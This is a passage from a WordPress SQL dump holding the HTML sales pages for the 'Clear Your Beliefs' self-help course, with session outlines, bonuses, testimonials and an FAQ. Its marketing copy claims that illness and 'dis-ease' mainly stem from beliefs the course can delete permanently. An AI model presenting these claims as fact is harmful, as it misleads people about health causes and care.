src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Sherri', '', 'publish', 'closed', 'closed', '', 'sherri', '', '', '2015-08-06 00:20:40', '2015-08-06 05:20:40', '', 2233, 'http://clearyourbeliefs.com/?page_id=2234', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2238, 2, '2015-08-06 02:32:36', '2015-08-06 07:32:36', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not 